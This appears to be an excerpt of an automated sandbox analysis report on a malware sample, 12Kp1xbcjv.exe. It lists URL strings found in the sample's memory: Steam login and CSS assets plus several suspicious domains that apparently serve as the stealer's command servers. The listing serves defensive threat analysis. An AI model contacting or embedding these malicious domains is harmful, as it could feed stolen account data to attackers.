00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280737448.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346459690.00000000039B0000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343546944.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209369816.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1344278638.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280565524.000000000086D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318823303.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294255287.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209193470.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343787347.000000000086B000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1213698785.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345099486.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294995902.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294146278.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1261263959.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=oQ1d_VAfa_o
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1280952680.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1346666701.0000000003A53000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/dAnjhw
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/dAnjhw/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1182124111.00000000039DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000002.1346476739.00000000039B4000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280452526.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1197533106.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280414847.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343682140.00000000039B2000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318502097.0000000003AA6000.00000004.00000800.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318628222.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280433565.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167090803.000000000086F000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343477901.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280390061.00000000039DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://htardwarehu.icu/Sbdsa
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jowinjoinery.icu/bdWUa
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://legenassedk.top/bdpWO
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1167109949.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mrodularmall.top/aNzS
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1220284423.0000000003A3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236001508.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1237176889.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/$a
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209607996.0000000000871000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/Ha
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1343352034.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.0000000000878000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000002.1345119129.000000000087E000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265558085.0000000000873000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1318547592.0000000000878000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/a
          Source: 12Kp1xbcjv.exe, 00000000.00000003.1261246061.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236046348.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.000000000080C000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1265772430.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1267206396.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1178964174.0000000000823000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1236001508.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1280547088.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209607996.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1294232377.0000000000898000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1295088232.000000000089A000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1266660441.000000000088D000.00000004.00000020.00020000.00000000.sdmp, 12Kp1xbcjv.exe, 00000000.00000003.1209216702.0000000000895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pupmeholk.bet/pLoska
